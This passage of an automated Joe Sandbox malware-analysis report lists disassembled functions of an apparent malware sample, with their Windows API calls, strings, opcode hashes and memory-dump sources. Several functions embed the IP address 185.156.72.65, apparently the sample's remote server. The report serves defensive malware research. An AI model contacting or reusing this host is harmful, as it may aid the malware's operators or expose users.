                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                      Function 04951482 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: a45ec91265a130491ca744ceba9d666514f598402c535a81d2d6f777d8ba8db7
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: E8219375A04205AFEB20EF65DC81E7B77AEAF842687204935FD1A97170E774FC4287A0
                      Function 00418485 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                      Function 049535E0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,049536EF,0494381E,?,00000000,04942AA0,04942AA2,?,04953868,00000022,00420B0C,00422950,00422958,04942AA0), ref: 049536A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: dc75c547a42f12a9f289368585f08454ecf7689698170e341f7030a169091c8b
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: F821C331A02611ABC731DB65EC42A5A7BA99B427E0B254238ED06A73B1DB30FD05C794
                      Function 049586EC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 049586F4
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0495872C
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0495874C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: da794a8fd2d3a790ccbef012f21260be0a07f8a954a768ae26b22ec8f6b15c65
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 03118EB66015197EA721FB765C88CAF2EADCEC91A87210534FD06A1120FA60FE1287B5
                      Function 0041CC28 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                      • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                        • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                      • ___initconout.LIBCMT ref: 0041CC5B
                        • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                      Function 0495CE8F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000), ref: 0495CEA6
                      • GetLastError.KERNEL32(?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000,00000000,?,0495A2C8,?), ref: 0495CEB2
                        • Part of subcall function 0495CE78: CloseHandle.KERNEL32(0042CA30,0495CEC2,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000,00000000), ref: 0495CE88
                      • ___initconout.LIBCMT ref: 0495CEC2
                        • Part of subcall function 0495CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0495CE69,0495CAF3,00000000,?,04959D25,00000000,00000000,00000000,00000000), ref: 0495CE4D
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000), ref: 0495CED7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 89c4c1b7f98522a9b69b08b15cfafe70a43135fa4217921e32848bd1af09b4f5
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: B8F0303A540258BBCF229FD5EC08ACE3F26FF486A1B518030FE1996130D732AC259BD4
                      Function 00409D4D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                      Download Yara Rule
                      APIs
                      • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                      • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                      • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                      • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                      • String ID:
                      • API String ID: 3269011525-0
                      • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                      • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                      Function 00410F1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                      Download Yara Rule
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                      • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                      Function 004095D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                      Download Yara Rule
                      APIs
                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                      • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                      • String ID: vector too long
                      • API String ID: 3646673767-2873823879
                      • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                      • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                      Function 0494BA67 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                      Download Yara Rule
                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0494BAA6
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0494BB5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 3480331319-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: f8fd4814fa1228670a746e36af1c5dbbd4f4a5f8c078400c8c653d4389a200f2
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 1941A130A00219AFDF10DF69C884EAEBBF5AF85328F148575E8146B3A5D731FA15CB90
                      Function 0040C0A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                      Function 0494C307 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 0494C32C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: c4ba9752dcd84c22c44dd6542354d8036f89c1105082fda42e1d9e8fd5a27bc6
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: B1414872901209AFDF16CF98C980EEEBBB9BF88304F158169F914A7225D735A950DF50
                      Function 00401000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401084
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                      • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                      Function 00401110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401194
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                      • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                      Function 00401220 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004012A4
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                      • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                      Function 04941487 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 0494150B
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction ID: 98aa35c248c7357362b975aeb6d892297c345811a15bf566927ec248ad7140a2
                      • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction Fuzzy Hash: 132126B0F002059EDB24EFB8E919BA97BB0FF85308F9041B9C4139B2A1D7757545CB59
                      Function 04941267 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049412EB
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction ID: 3d756ea9ba8b64fd540d48becca53452bae07eee396b8f7b50ee9fca1bafdc03
                      • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction Fuzzy Hash: 69216BB0F002459EDB14EFB8E919FA97BB0FB81308F9001B9E44567350D7B56589CB5D
                      Function 04941377 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049413FB
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction ID: 39467b310fd79930c8b0e99fb2bed8e03df8f1992097a7dfc7e1b35ffb2f80bf
                      • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction Fuzzy Hash: 722129B0F002449EDB24EFB4E929BA97BB0FF81308F9001B9D80557251D7B57585CB59
                      Function 00408480 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004084EE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                      • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                      • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                      Function 00407E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407EEE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                      • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                      • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                      Function 049486E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04948755
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
